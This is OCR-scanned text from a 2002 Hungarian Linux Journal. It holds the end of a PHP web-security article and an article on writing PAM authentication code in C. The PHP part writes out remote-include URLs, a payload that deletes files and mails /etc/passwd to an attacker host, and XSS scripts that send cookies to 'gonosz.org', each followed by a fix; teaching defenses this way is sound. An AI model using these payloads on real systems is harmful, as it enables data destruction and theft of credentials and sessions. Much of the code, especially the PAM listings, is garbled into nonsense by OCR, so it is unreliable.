fájlokkal egyéb bajok is vannak. Képzeljünk el egy webes 
alkalmazást, ami engedélyezi a 100 K-nál kisebb állományok 
feltöltését. Ilyen esetekben sea move uploaded file(),se 
azis uploaded file() függvény nem segítene. A támadó 
még így is elküldhetné a saját űrlapját, megadva a fájl méretét, 
akárcsak az előző példában. A fájl valódiságának ellenőrzésére 
a legalkalmasabb út az, ha az adatok lekérdezésérea $ FILES 
teljes hatókörű tömböt használjuk: 


27pHhÓ 
if ($fajl feltoltes 66 

$ FILES[/7fn"] [/type"] 

2 PIHESTítn1i s1ízé"1. a 

move uploaded file( 

s FILEST Én" il" "tűo name" !.: 


"9" köpek/ " ) ; 


-- !"image/gif" 66 


100000) ( 


] 
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Beszerkesztett (include) fájlok 

PHF-ban az include () , include once(), reguire () és 
reguire once () segítségével helyi és távoli fájlokat egyaránt 
be lehet szerkeszteni a programba. Ez hasznos lehetőség, mivel 
ilyen módon külön fájlokban lehet tárolni az osztályokat, az 
újrahasznosított kódot és a többit, így növelve a kód karban- 
tarthatóságát és megbízhatóságát. 

Ugyanakkor alapvetően elég veszélyes távoli fájlokat beszer- 
keszteni, mivel elképzelhető, hogy a távoli oldalt netán feltör- 
ték, vagy a kapcsolatot egy másik kiszolgálóra térítették el. 
Bármelyik esetben a programba ismeretlen és esetlegesen rossz 
szándékú kód illesztődik be. 

A fájlok beszerkesztése néhány más jellegű gondot is felvet, 
használótól bekért adaton alapul. Képzeljünk el egy progra- 
mot, ami HTML -fájlokat illeszt be és jelenít meg valamilyen 
megfelelő formátumban: 


c ?php 
include (Soldalszerkezet) ; 
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Ha valaki az Soldalszerkezet változót mondjuk a GET-en 
keresztül adná meg, könnyen kitalálható, milyen következ- 
ményekkel számolhatunk: 


http: //example . com/leftframe.php?layout- 
5 /etc/passwd 

vagy 

http: //example . com/leftframe .php?layout- 
shteto:r//donosz. org/őhüncüt html 


és ez a huncut.htmi mondjuk a következő néhány sort tartalmazza: 


z7phpb 
passthru(:rm : ) ; 
passthru(:mail gonoszOAgonosz.org 
5 c/etc/passwd : ) ; 

?5 


Hogy ezt az eshetőséget elkerüljük, mindenképpen ellenőriz- 
zük le a változó tartalmát, mondjuk egy szabályos kifejezéssel. 


Oldalak közti kódátvitel (Cross-Site Scriptiny — XS5) 

Az újságoknak és híroldalaknak köszönhetően ez a támadási 
forma meglehetősen nagy ismertségre tett szert az elmúlt idők- 
ben. Egy egyszerű kereséssel a BuglIrag levelezési lista archívu- 
mában csak júniusban 15 találatot kapunk, amelyek mind kü- 
lönböző webes alkalmazások XS5S-en alapuló hibáit tárgyalják. 
Az effajta támadás egyenesen az oldalak felhasználói ellen irá- 
nyul. Ezt a támadó úgy éri el, hogy rábírja a felhasználót, kat- 
tintson egy megfelelően kialakított hivatkozásra. Ez egyszerűen 
megoldható mondjuk egy HIML-levéllel, egy webalapú fórum- 
ban, de akár egy sanda szándékú weboldalon is. Az áldozat 
talán nem is tud róla, hogy egy ilyen trükkös hivatkozásra kat- 
tintott, ha ez a hivatkozás mondjuk egy weboldalba van beá- 
gyazva; sőt olykor egy-egy hiba kiaknázása még felhasználói 
közreműködést sem igényel. Vagyis ha a felhasználó böngészője 
megkapja a kért oldalt, az abban található parancsfájl a felhasz- 
náló biztonsági beállításai mellett szinte bármit megtehet. 

A korszerű felhasználóoldali parancsnyelvek egy sor olyan 
szolgáltatással rendelkeznek, amelyek esetenként egyáltalán 
nem biztonságosak. Bár alapesetben a JavaScript csak az adott 
oldal sütijeit érheti el, a rosszul megírt parancsfájlok esetenként 
azonban más oldalak sütijeihez is hozzáférhetnek. 
X959-támadásoknál gyakori eset, hogy például a felhasználó 

be van valamilyen webes alkalmazásba jelentkezve, és a mun- 
kafolyamatához tartozó sütik a gépén tárolódnak, a támadó 
pedig egy ellenőrizetlen bemenet segítségével egy hivatkozást 
készít az alkalmazáshoz, ami feldolgozza az áldozat kérését, 

és meg is jeleníti azt. 

Az alábbi példa arra szolgál, hogy megértsük, miről van szó. 
Képzeljünk el egy webes alkalmazást, ami vakon megjeleníti 

a levélhez tartozó téma mezőt: 


27pho 


echo "-TD5 Stema c/TD:!" ; 
?5 


Ebben az esetben a támadó akár egy JavaScript-kódot is elrejt- 
het a levél téma mezőjébe, ami — ha a felhasználó megnézi a 
levelet — önmagától végrehajtódik. Ez a hiba felhasználható 
arra, hogy a felhasználó sütijeinek a segítségével egy ehhez 
hasonló JavaScript-kóddal ellopják munkafolyamatot: 
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cscript: 

self .location.href-"http: //gonosz . org/ 

s suticsapda.html?suti-"iescape (document . cookie) 
c/scripts: 


Amikor a felhasználó megnyitja a hivatkozást, akkor a Java- 
Script-kódban megadott helyre irányítódik tovább, ami egyút- 
tal a felhasználó sütijeit is kiadja. A támadónak nem kell mást 
tennie, mint belepillantania a webkiszolgáló naplófájljaiba, 
hogy megtudja az áldozat munkafolyamatának azonosítóit. 

A htmilspecialchars () függvénnyel azonban elkerülhetjük 
az efféle kellemetlenségeket. A htmlspecialchars () a 
HIML-vezérlőkaraktereket HIML-kódokká alakítja, vagyis 
például a c Os - karaktereket a cscript:-ből a nekik meg- 
felelő HTML-kóddá alakítja át, §-1t ;-vé, és €gt ; -vé. Így 
amikor az áldozat böngészője megjeleníti az oldalt, semmi 
veszélyes nem történhet, mivel a levélben csak egy 

g1t ; scriptégt ; karaktersorozatot lát, aminek semmilyen 
jelentése nincs, egyszerű szövegként értelmezhető. 

A megoldás tehát a következő: 


0 Kiskapu Kft. Minden Jog fenntartva 


z7php 


echo "c-ID3 ".htmlspecialchars(Stema) . " 
az /TD3T ; 
95 


Egy másik általános eset, amikor egy űrlap nem látható 


sa 


mezőjébe szúrunk be értékeket: 


cinput type-"hidden" name-"oldal" 
5value-"-?php echo Soldal; ?:"5 


Lássuk a következő URL-t: 


http: //example . com/oldal1 .php?oldal-": 

5 cscript:self.location.href-"http://gonosz . org/ 
—5xss-tamadas.html?sutik-" 

5 yescape (document . cookie) c/script: 


Ha a támadónak sikerül rávennie minket, hogy ellátogassunk 
egy ehhez hasonló hivatkozásra, lehetséges, hogy böngészőn- 
ket a támadó oldalára irányítja tovább, mint az előző példában. 
Mivel azonban az $ol1da1 változó számtípusú, az effajta hiba 
egyszerű típuskényszerítéssel elkerülhető: 


cinput type-"hidden" name-"page" value- 
m"-?php echo intval(Spage); ?:"s 

Még egyszer tehát: ahhoz, hogy az efféle támadásokat elke- 
rüljük, mindig ellenőrizni kell a felhasználó által megadott 
bevitelt, vagy pedig — mielőtt bármit is megjelenítenénk — 

a htmilspecialchars () függvénnyel el kell távolítanunk 
a HIML-vezérlőkaraktereket. 


Linux Journal 2002. október, 102. szám 


Nuno Loureiro 

(nunogeth.pt) az ethernet Ida társalkotója 

(2 http:/Avww.eth. pt). Három éve foglalkozik PHP-progra- 
mozással, számos webalkalmazás készítését irányította. 
Szeret hegyet mászni és túrázni. 
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Alkalmazásbiztonság a PAM modul segitségével 


A PAM (Pluggable Authentication Module) alapjai, 
PAM támogatású alkalmazások fejlesztése és PAM-beállításfájl létrehozása. 





hitelesítés olyan folyamat, ami azt ellenőrzi, hogy az 
adott entitás valóban az-e, akinek állítja magát. Linux- 
rendszereken a felhasználók hitelesítésére a su, 


passwd vagy login alkalmazásokat használjuk, még mielőtt 
a rendszer erőforrásaihoz engednénk őket. A felhasználói 
adatok szinte minden Linux-terjesztésben a /etc/passwd fájlban 
tárolódnak. Ez egy olyan szöveges állomány, ami a felhasználó 
login nevét, titkosított jelszavát, az egyedi, numerikus fel- 
használói azonosítót (amit uid-nek neveznek), egy numerikus 
csoportazonosítót (amit gid-nek nevezünk), tetszés szerint 
megadható megjegyzésmezőt (ahol általában a felhasználó 
valódi nevét, telefonszámát és hasonló dolgokat tárolhatunk), 
a saját könyvtárát és a kedvenc héjprogramját tartalmazza. 

A /etc/passwd egy sora valahogy így néz ki: 


aztec:K52xi345vMO:900:900: Aztecsoftware, 
Bangalore : /nome/aztec : /bin/bash 


Ha a valóságban belenézünk a /etc/passwd fájlba, természete- 
sen inkább valami ilyesmit fogunk látni: 


aztec:x:900:900:Aztec software, Bangalore : 
mm /home/aztec: /bin/bash 


Hová lett a titkosított jelszó? 

A /etc/passwd fájlt minden felhasználó olvashatja, ami bárkinek 
lehetővé teszi, hogy a rendszer összes felhasználójának titko- 
sított jelszavát összegyűjtse. Bár a jelszavak kódoltak, jelszótörő 
programokat könnyű beszerezni. A növekvő biztonsági 
fenyegetések miatt kifejlődtek az árnyékjelszavak. 

Ha a rendszeren be van kapcsolva az árnyékjelszó-rendszer, 

a /etc/passwd jelszó mezőjébe mindössze egyetlen x kerül, 

a felhasználó valódi titkosított jelszava pedig a /etc/shadow 
(árnyék) fájlban tárolódik. Mivel a /etc/shadow állományt csak 
a rendszergazda olvashatja, a rosszakaratú felhasználók nem 
tudják feltörni társaik jelszavait. A /etc/shadow sorainak tartal- 
mát a felhasználó bejelentkező neve, titkosított jelszava, illetve 
néhány, a jelszó lejáratával kapcsolatos mező teszi ki. Egy jel- 
legzetes bejegyzés a következőképpen néz ki: 


aztec:/3GJajkg104125:11009:0:99999: 7: : : 


A Linux megjelenésének kezdetekor, amikor még az alkal- 
mazásoknak kellett azonosítaniuk a felhasználókat, a szükséges 
adatot egyszerűen csak ki kellett volna olvasni a /etc/passwd 

és /etc/shadow fájlokból. Ha meg kell változtatni a felhasználó 
jelszavát, elegendő a /etc/passwd és /etc/shadow fájlokat 
átszerkeszteni. 

Ez a módszer, bár kétségkívül egyszerű, nehézkes és számos 
gondot okoz a rendszergazdáknak és az alkalmazásfejlesztők- 
nek. Minden alkalmazásnak, amely felhasználóhitelesítést 
igényel, tudnia kell, hogyan érheti el a keresett adatot, amikor 
a többféle hitelesítési módozat közül valamelyikkel kapcsolatba 
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kerül. Ezért aztán az előjogokat adó alkalmazásprogramok 
erősen kötődnek valamelyik hitelesítési módszerhez. Amint 
felbukkan egy új hitelesítési módszer, a régiek elavulttá válnak. 
Azaz ha a rendszergazda meg akarja változtatni a hitelesítési 
sémát, az egész alkalmazást újra kell fordítania. 

E hátrányok kiküszöbölésére olyan rugalmas szerkezetet kell 
kidolgoznunk, amely elválaszthatja az előjogadó programok 
és a megfelelően biztonságos hitelesítési sémák fejlesztését. 

A Linux Pluggable Authentication Module (PAM) egy ilyen 
megoldás, amely sikerrel szünteti meg az azonosító sémák 

és az alkalmazások szoros összefonódását. 

Az alkalmazás a programozó szemszögéből nézve: a PAM 
gondoskodik a hitelesítési feladatról és ellenőrzi a felhasználó 
személyazonosságát. A rendszergazda szemszögéből: nagy 
szabadságot jelent, hogy szabadon dönthetünk, melyik hitele- 
sítési sémát választjuk Linux-rendszerünkön PAM-alapú 
alkalmazásainkhoz. 


Felhasználó 


Modulok 
A PAM-rendszer 


Ábránk a PAM-rendszer négy nagy alkotórészét mutatja be. 

Az első elem a PAM-programkönyvtár, amely a PAM-alapú 
alkalmazások és modulok fejlesztéséhez szükséges felületet és 
függvényeket teszi elérhetővé. 

A második a PAM-alapú alkalmazás, egy olyan alkalmazás, 
amely valamilyen szolgáltatást nyújt. A szolgáltatás elérése 
előtt esetleg azonosítani kell a felhasználót. A hitelesítési lépés 
előtt az alkalmazás kapcsolatba lép a Linux-PAM könyvtárral, 
és meghívja a szükséges hitelesítési szolgáltatásokat. Az alkal- 
mazás maga semmit nem tud a felhasznált hitelesítési módszer 
részleteiről. Az alkalmazásnak elérhetővé kell tennie egy úgy- 
nevezett párbeszéd- (conversation) függvényt, amely lehetővé 
teszi a betöltött azonosító modul és az alkalmazás közti 
kölcsönös kapcsolattartást. 

A harmadik összetevő a Pluggable Authentication Module, 
amely valamilyen (tetszőleges) hitelesítési módszer kezelését 
támogató bináris állomány. Betöltés után a modulok közvet- 





lenül tudnak kapcsolatot tartani az alkalmazással az alkalmazás 
által elérhetővé tett párbeszédfüggvényen keresztül. Ezen 
keresztül cserélgethetjük a felhasználótól bekért (vagy felaján- 
lott) szöveges adatot. 

Az utolsó elem a PAM-beállítófájl. Olyan szöveges állományról 
van szó, amelyben a rendszergazda megadhatja az egyes alkal- 
mazásokhoz használt hitelesítési sémákat. Linux-rendszereken 
ez a beállítási adat egyaránt lehet a /etc"pam.d mappában, vagy 
egy sor a /etc/conf beállítófájlban. A PAM-beállításfájlt a rendszer 
a PAM-könyvtárak alaphelyzetbe állítása során dolgozza fel. 

A PAM-könyvtár ezután betölti a megfelelő hitelesítési modult, 
azt, amelyet az adott modul hitelesítési sémájához állítottunk be. 


Linuxos PAM támogatású alkalmazás fejlesztése 
PAM-támogatással bíró alkalmazások írásakor először meg kell 
hívnunk a PAM-könyvtár megfelelő hitelesítési függvényét. 
Egyúttal a párbeszédfüggvényt is meg kell adnunk, amelyen 
keresztül a modul közvetlenül tud kapcsolatot tartani az 
alkalmazással. 

A PAM APTI-hitelesítést végző függvényei a következő három 

lényeges szolgáltatást tartalmazzák: 

1.pam start ( ) : az első PAM-függvény, amit az alkalmazás- 
nak meg kell hívnia. Ez a függvény állítja alaphelyzetbe a 
PAM-könyvtárat, illetve beolvassa a PAM-beállításfájlt, és 
betölti a kívánt hitelesítési modult a beállításfájlban megadott 
sorrendben. A PAM-könyvtárra irányuló mutatót ad vissza, 
amit az alkalmazás azután a könyvtárral való további kap- 
csolattartása során felhasználhat. 

2. pam end(): A PAM-könyvtár utolsó függvénye, amit az 
alkalmazás meghív. Visszatérésekor a PAM-könyvtárra 
irányuló mutató többé már nem lesz érvényes, és az összes 
hozzárendelt memóriaterület felszabadul. 

3. pam authenticate ( ) : ez a függvény szolgál kapcsolófe- 
lületül a betöltött modulok hitelesítési folyamatához. Az al- 
kalmazásnak kell meghívnia, amikor a szolgáltatást kérő 
felhasználót azonosítani akarja. 


A hitelesítési eljárásokon kívül a PAM API az alkalmazás által 

hívható következő függvényeket is elérhetővé teszi: 

e pam acct mgimt( ) : ellenőrzi, hogy a felhasználó 
azonosítója érvényes-e. 

e pam open session( ) : új folyamatot kezdeményez. 

e pam close sessiont( ): befejezi a futó folyamatot. 

e pam setcred ( ) : kezeli a felhasználó tanúsítványait. 

e pam chauthtok ( ) : megváltoztatja a felhasználóazonosító 
nyelvi egységét (token). 

e pam set itemt(): menti a PAM folyamatállapotát. 

e. pam get item-( ): visszatölti a PAM folyamatállapotát. 

e pam strerror ( ) : hibakiírást ad vissza. 


Az alkalmazás ezeket a PAM APT-eljárásokat a security/pam. appl.h 
felületen keresztül érheti el. 

A párbeszédfüggvény közvetlen kapcsolatot hoz létre az 
alkalmazás és a betöltött modul között. Ez a modul részéről 
többnyire annyit tesz, hogy a felhasználótól bekéri a felhasz- 
nálónevet, a jelszót és így tovább. A párbeszédfüggvény 

(conv func) alakja a következő: 


int conyv fünc 1iiüt const strüúct pán. messáge 
$x,. StTUGCt pam response $t void )i 


A betöltött hitelesítési modul a pam message szerkezet 
segítségével néhány adatot igényel az alkalmazástól, ami 
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ezeket a szükséges adatokat apam response szerkezet 
segítségével juttathatja el a modulnak. 

Kérdés azonban, honnan tudja a modul a párbeszédfüggvény 
címét? A megoldás kulcsa a párbeszédszerkezetben rejlik: 
struct pam conv. Az alkalmazásnak a párbeszédfüggvényre 
mutató mutató segítségével először be kell állítania a párbe- 
szédszerkezetet. Alaphelyzetbe hozás után a párbeszédfügg- 
vény a pam start () függvény hívásakor értékként kerül 

a PAM-könyvtárhoz. A megkapott mutatóval a modul már 
megkezdheti adatcseréjét a párbeszédfüggvénnyel. 


Rakjuk össze mindezt! 

Fejlesszünk ki egy alkalmazást, ami a pillanatnyi időt adja 
vissza. Legyen ez egy olyan alkalmazás, amely a szolgáltatás 
előtt azonosítja a felhasználót. 

Először is illesszük be a megfelelő fejléceket! A PAM API 
csatolófelülete a security/pam appl.h fejlécfájl. Ezt követően 
állítsuk alaphelyzetbe a párbeszédszerkezetet: 


static struct pam conv conv —- í( 
My: GONY , //function pointer to the 
//conversation function 
NULL 


b; 


Majd írjuk meg a main () tagfüggvényt. Ehhez előbb be kell 
töltenünk a PAM-könyvtárat. Mint már tudjuk, az alkalmazás- 
nak meg kell hívnia a PAM-könyvtár tagfüggvényeit ahhoz, 
hogy az igényelt hitelesítési feladatot elvégezhesse. Csakhogy 
mi módon szerezheti meg az alkalmazás a Llibpam PAM- 
könyvtárleíróját? A Llibpam-et apam start () függvény 
állítja alaphelyzetbe, átadva neki a service name (szolgál- 
tatásnév) alkalmazásnevet, az igényelt hitelesítési szolgálta- 
tástípust, az azonosítandó személy felhasználónevét és a 

pam conv szerkezetre mutató mutatót. A függvény a Llibpam 
kezelőjével (pamh) chandles; tér vissza, amely lehetővé 
teszi a PAM könyvtár további hívásait: 


ban handle € $tpamn E 
int retval - 0; 


NULL; 


retval - pam start( 
at ahéck üser" , NULL, 6conv , epamd) ; 
if(íretval !- PAM SUCCESS) 

exit (0) ; 


Ha a felhasználónevet nem akarjuk átadni a pam start ()-nak, 
átadhatunk NULL-t is. A betöltött hitelesítési modul azt a párbe- 
szédfüggvényen keresztül később be fogja kérni a felhasználótól. 
A main() tagfüggvény megírásának második lépése a felhasz- 
náló hitelesítése. Most jön el az igazság pillanata: eldől, hogy 
a felhasználó valóban az-e, akinek mondja magát. Hogyan 
derül ki mindez? A pam authenticate () függvény szolgál 
csatolófelületként a betöltött modul hitelesítési módszeréhez. 
Ellenőrzi a felhasználó által adott felhasználónevet és jelszót 
a megfelelő hitelesítési modul segítségével. Siker esetén 
PAM SUCCESS-t ad vissza, ha viszont nincs egyezés, vala- 
milyen a hiba okát leíró kódot ad vissza: 
retval s. pam aüthenticate (damn, 0] ; 
ifíretval -- PAM SUCCESS) 

printf ("$sWVa" , "Authenticated.!") ; 
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else 
printf("$sWa" , "Authentication Failed.") ; 


Megfigyelhetjük, hogy átadtuk a pamh kezelőt, amelyet 

a korábbi pam start () hívás során kaptunk meg. 

A művelet harmadik lépése, hogy engedélyezzük a hozzáférést 
a kívánt szolgáltatáshoz. Most, hogy a felhasználót azonosí- 
tottuk, immár jogosul elérni az igényelt szolgáltatást. Példánk- 
ban a szolgáltatás a pillanatnyi időt adja vissza: 


FEtÜÉN CUÚttett. É1MmeE[() ; 


Végül eleresztjük a PAM-könyvtárat. Miután a felhasználó 
befejezte az alkalmazás használatát, a PAM könyvtárat ki kell 
törölni a memóriából. Egyúttal a pamh kezelőhöz rendelt 
memóriát is érvényteleníteni kell. Mindezt a pam end() 
hívással érhetjük el: 


int pam status zs 0; 
if(pam end(pamh, pam status) !- 
PAM SUCCESS) ( 

pámh. c. NULL; 

exit (1); 


] 


A pam end() második értékeként használt pam status a 
modulfüggő cleanup () visszahívásfüggvény (callback) értéke 
lesz. Ezáltal a modul a leválasztása előtti utolsó pillanatban is 
el tudja végezni a fontos feladatokat. A függvény sikeres 
visszatérése esetén a pamh kezelőhöz tartozó valamennyi 
memória felszabadul. 


A párbeszédfüggvény létrehozása 

Az 1. listában egy vázlatos párbeszédfüggvény megvalósítását 
láthatjuk. A párbeszédfüggvény hívásakor átadott érték célja a 
modul és az alkalmazás közti adatcsere elősegítése. A num msg 
tárolja a msg mutatótömb hosszát. Sikeres visszatérés esetén 

a tresp mutató a pam response szerkezetek tömbjére 
mutat, ahol az alkalmazás által megadott szöveget találjuk. 

Az üzeneteket (a modultól az alkalmazásnak) közvetítő 
függvényt a security/pam appl.h határozza meg: 


struct pam message ( 
int meg style; 
const char "msg; 


Hi 


Azáltal, hogy az üzenettömb címét megkaptuk, lehetővé válik, 

hogy a modulból egyetlen hívással egyszerre több dolgot 

adjunk át az alkalmazásnak. A msg style érvényes értékei: 

e PAM PROMPT ECHO OFF: szöveget kér be, kijelzés nélkül 
(pl.: jelszavak). 

e PAM PROMPT ECHO ON: szöveget kér be, kijelzéssel 
(például felhasználónév). 

e PAM ERROR MSG: hibaüzenetet jelenít meg. 

e PAM TEXT INFO: valamilyen szöveget jelenít meg. 


A válaszadó szerkezetet (ez az alkalmazástól a modulra 
irányul) a security/pam appl.h csatolásával adhatjuk meg: 


struct pam response ( 
char "resp; int resp retcode; 
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7. lista Egyszerű párbeszédfüggvény 


int su cony (1ÍM066KEkEbdÖll 
(e(ela toe ÚCE DEM MESBZASS -MEGM, BETUÜGE 
pam respGHs cime Sjemeomtelkie e eroje elen 


öt count; 
Böruct pam EESBENSSSSEG 
char "recvpass-(char ?) 
mal FlöeW20 s SÜZSGEKNEeMan E 
(SE VPbaSST 19) 0 
I ES ETÜG EN DENES PONSE TELT TGSÉRÜMESS 
metszet Sert am tesbonse) 9 


for (CSURESÜ; COUNE SS SG ; E COÜNE ) 


( 


ewitétulmisemicounele msg seyve) 


( 


case PAM PROMPT ECHO OEBE : 
prince "zet megmicouneéi meg) ; 
getPassword (recvpasSs) ; 
break; 

CASE PAM SEROMETSSETOSÖN s 
primcti "zs  megmicounei megi; 
scanf ("Ss" , recvpass) ; 


break; 

case BAM "ERROR "MEG : 
printE( "ősi megm counei meg) ; 
break; 

case / PAM TEXT INBO: 
peintt ("ess at megmiéoúneti -meg) s 
break; 

default: 


printf ("Erroneous Conversation 
szd) Ete mee SÖLELE I] 
5 -eMSGgESEPTE 


] 


TI SGHE E TeSpETSESSődé 0; 
r [count] .resp - recvpass; 


jséigeS jo S ááNTaE 
TetÜüvii PAM SUCCESS; 


] 


void getPassw ord(char frevcbuf) 


í 
STTn sület 0E 
claaxz la [201 ; 


white SegEECN( ) Jen) 
Teo tett TTSGSETSETt SA GÉ é 
KOÜLEÜ ESSss VO 


etrepy (ESEVDÜE , BE) ; 





Jelenleg aresp retcode értékek nincsenek meghatározva; 
a szabályos visszatérési érték a 0. 


Fordítás és összeépítés 
Fordítsuk le az alkalmazást a következő paranccsal: 


gcc -o azapp azapp.c -1lpam -L/usr/azlibs 


A /usr/azlibs mappa helyére azt az útvonalat kell írni, ahol 
a Linux-PAM könyvtármodult, azaz a libpam.so-t találjuk. 
Ez a könyvtárfájl tartalmazza a pam appl.h-ban megadott 
függvények meghatározásait. 


A Plugyable Authentication Module (PAM) fejlesztése 
Amikor modulfejlesztési feladatba kezdünk, először is tisztában 
kell lennünk a megvalósítandó modul típusával. 

A modulokat működésük szerint négy különböző csoportba 
lehet sorolni: hitelesítés (authentication), számla (account), 
folyamat (session) és jelszó (password). A helyes megadáshoz 
e négy csoport legalább egyikéből valamennyi odatartozó 
függvényt meg kell határozni. 

Használjukapam sm authenticate () függvényt, ha hite- 
lesítő modult szeretnénk létrehozni, amely lényegében a hite- 
lesítést végzi. Majd használjuk apam sm setcred() függ- 
vényt. Általános esetben a hitelesítő modul a hitelesítő jelen 
kívül a felhasználóval kapcsolatos további adatokhoz is 
hozzáfér. A második függvény az ilyen adatot teszi elérhetővé 
az alkalmazás számára. Ezt csak akkor szabad meghívni, 
amikor a felhasználó már azonosította magát, de a folyamatot 
még nem kezdtük meg. 

A számlakezelési modellmegvalósításokban a 

pam sm acct mgnmtw() lesz az a függvény, amely a munkát 
elvégzi, és megmondja, a felhasználó jelenleg jogosult-e a 
szolgáltatás elérésére. A felhasználót e lépés előtt a hitelesítő 
modullal azonosítani kell. 

Az üléseket kezelő modula pam sm open session() meg- 
hívásával kezdeményezhet üléseket. Amikor az ülést be kell 
fejezni, apam sm close session() függvényt hívjuk meg. 
Az is megoldható, hogy az egyik alkalmazás által megnyitott 
ülést egy másik zárja be. Ehhez vagy az kell, hogy a modul 
kizárólaga pam get item() függvénytől beszerzett adatokat 
használja fel, vagy az üléshez tartozó adatot az operációs 
rendszer valamilyen módon megőrzi (például egy fájlban). 
Végülapam sm chauthtok() a jelszókezelő modult való- 
sítja meg, ahol a függvényt a felhasználó hitelesítési jelének 
(újra)beállítására használhatjuk fel (tehát megváltoztathatjuk 
a felhasználó jelszavát). A Linux-PAM könyvtár ezt a függ- 
vényt egymás után kétszer hívja meg. Az azonosítási jel csak 
a második hívás során változik meg, miután ellenőrizte, hogy 
egyezik a korábban begépelttel. 

Ezeken a lehetőségeken túl a PAM API a következő függvé- 
nyeket nyújtja a moduloknak: 

e pam set item-(): állapotadatot ír ki a PAM-ülésről. 

e pam get item():állapotadatot olvas vissza a PAM-ülésről. 

e pam strerror ( ) : hibaszöveget ad vissza. 


A modulfejlesztéshez szükséges PAM API-függvényeket 
a security/pam modules.h csatolófelületen érhetjük el. 


Rendezzük az eddigieket! 

Készítsünk egy olyan modult, ami hitelesítéskezelést végez. Eh- 
hez létre kell hoznunk a hitelesítéskezelési csoportba tartozó 
függvényeket. Kezdjük a szükséges fejlécek csatolásával. A Linux- 
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2. lista Apam sm authenticate() megvalósításának alapjai 


PAM EXTEBEN int pam SmőEétEBEMBESSGEET 
pam harnieldssükekő s aö6 cet eáttál Setét őő 
int asgc con CGGNEt E s ae) 


ünsigned inet 
int retval; 
const char "name, "pp; 


/: get the user -name: F/ 
g 


Ttetma [ben EGSET ÜSSE daNá esem ENe T MMALSS áss Sat 
if (retval -- PAM SUCCESS) ( 

printf ("username l[I8s] obtained", name) ; 
) else ( 


printf("trouble reading usernameW!") ; 
páMESSE Cdátál banat tSeteredtétErT tő 
GIGAS) ETET zza MAZKÁTNT NT HE 
return retval ; 


] 


/F get this user:s authentication token F/ 


Tétva s res díóasewoTro pan saó e ve UT 
SZÜ NBAISISWo zel MME VENNÉ ÜNK ZÜTETTŐK ; $p) ; 
if (retval !- PAM SUCCESS) ( 


printf("could not read password 
efor $sWa" name) ; 
name —-— NULL; 
paMESÉt idátá (bantu SSteTed tett ő 
KG STR) TETSZ ETtEKVZEa A ÁEKESRTNT ÉJT ÉS 
return retval ; 


j 


/: verify the password of this user §/ 


Geeval cse KE ÉDASSWOGe [ami neme oz etétl e 
gt E ZSM [ERNE 


bene Gdása pam ds EE FEGÉESBÜT HG 
—; (zgalel 5) metvell; INÚILMI) § 
return retval ; 


] 


PAM könyvtár csatolófelülete a security/pam modules.h fejlécfájl. 
A következő lépés a felhasználó azonosítása; a 2. lista mutatja 
beapam sm authenticate () alapszerkezetének felépítését. 
E függvény célja, hogy az alkalmazástól bekérje a felhaszná- 
lónevet és a jelszót, majd a jelszótitkosítási séma alapján hite- 
lesítse a felhasználót. 

A felhasználói nevet apam get user() meghívásával 
szerezhetjük meg, ha az alkalmazás a start pam() hívás 
során a jelszót eddig még nem adta volna meg. 

A felhasználói név megszerzése után a felhasználótól be kell 
kérnünk a hitelesítő jelet (jelen esetben a jelszót), a 

. read password () meghívásával. A függvény a felhasználó 
jelszavának beolvasásához az alkalmazás nyújtotta párbeszéd- 
függvényt használja fel. 

A read password() függvény hívásához először beállítjuk 
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3. lista Apam sm setcred alapjainak megvalósítása 


PANMZESHERLV int pam SmeSetEredpamnemeketése e 
pamh afta est es ate e! 
const GÍRENaNEE EK emet 


unsigmete int ctrlf 
int retval; 


abrl]l — — sel ételőtee rt SL Bee FERT MET ALEHTEB 
SAO arg): 
EEtwva ss SERMESVECESS; 


printt ( "vecöverindg rvetürn code trom s autn 
sző 2 A ETL 
pamigetldata pan em sttse te tedőSS een ő 
ss conse void 831) pretval) 
if (pretval) ( 
retval - tpretval; 
free (pretval) ; 
printf ("recovered data indicates that " 
—WolLel metvel wzs SeW. meatval) ; 


] 


return retval ; 


a megfelelő adatokat apam message szerkezettömbben, hogy 
a párbeszédfüggvénnyel kapcsolatot tudjunk tartani: 


etruct pam messáge msg [3] ; 
SErüdt bán. TesbONSé FTESDI 
int i, replies; 


xpmsg [3] ; 


/F prepare to converse by "/ 
/: setting appropriate "/ 

/: data in the pam message F/ 
/: struct array ?r/ 


pmsglil - emsg[il; 
msg[i].msg style - PAM PROMPT ECHO OFF; 
msg[lir3r].msg - prompt1; 

replies - 1; 


Most hívjuk meg a párbeszédfüggvényt, ahol az i a párbeszéd- 
függvény válaszait jelenti: 

retval - converse(pamh, ctrl, i, pmsg, resp) ; 
A converse () függvény tulajdonképpen a modul kezelő- 
felülete az alkalmazás által nyújtott párbeszédfüggvényhez. 
Végül meghívjuka verify password() függvényt, amivel 
azonosíthatjuk a felhasználót. A verify password() függ- 
vény pedig a megfelelő titkosítási séma alapján azonosítja a 


felhasználó okmányait. 


A felhasználói okmányok (Credentials) beállítása 

Az azonosító modul általában több felhasználóval kapcsolatos 
adathoz férhet hozzá, mint amennyi az azonosítójelben meg- 
található. Apam sm setcred függvényt használhatjuk arra, 
hogy ezeket az adatokat az alkalmazás számára is hozzáfér- 
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4. lista Példa a converse() megvalósítására 


otatic imitt convers ERSBEKMNEtkeltse etette áá tniaő 
int ctrü$ööliikikiEblbbr, 8 ee 
pam messages messages ésÜle 
pam responScttome one 


int retval; 
eemüeeíbam Conv jáEGmnV 


teevalN e pamege ettem pan ss RAMECONN S 
SG OR S ENÉVTONK MESE MESÉS OTA) És 
if (retval -- PAM SUCCESS) ( 
retval —- conv-scony (nargs, 1t(const 


E SEGÜCETbaméMessage ts) 
message, response, 
"cony-sáppdatat ber) 


printf("visszatorOs az alkalmazgsb 1 " 
"özrbesződ" W)s 

Tee vetvma la  PAMESUCECEKOS 966 

ON (UNIX DEBUG,  €tr1))" 1 

pEINCE( "ogy beszöd hiba ni : 


] 


printt("köszenet1,; 
emodgudióz tak 


hogy visszatOrjen a 
"öztbészadt hő 


return retval ; 


] 


Lf af 


hetővé tegyük. Apam sm setcred egyszerű használatára 
látunk példát a 3. listában. A példaként felhozott függvény 
megvalósításában apam sm authenticate() visszatérési 
értékét egész egyszerűen átadjuk az alkalmazásnak. 


Kapcsolattartás az alkalmazással 

A converse () függvény kezelőfelületként működik a mo- 
dulalkalmazás-párbeszéd során. A converse () függvény 
megvalósítására látunk példát a 4. listában. 

A párbeszédfüggvény mutatóját a 

pam get item(pamh, PAM CONV, item) hívással érhetjük 
el. Ezt a mutatót felhasználva a modul közvetlenül beszélgetni 
kezdhet az alkalmazással. 


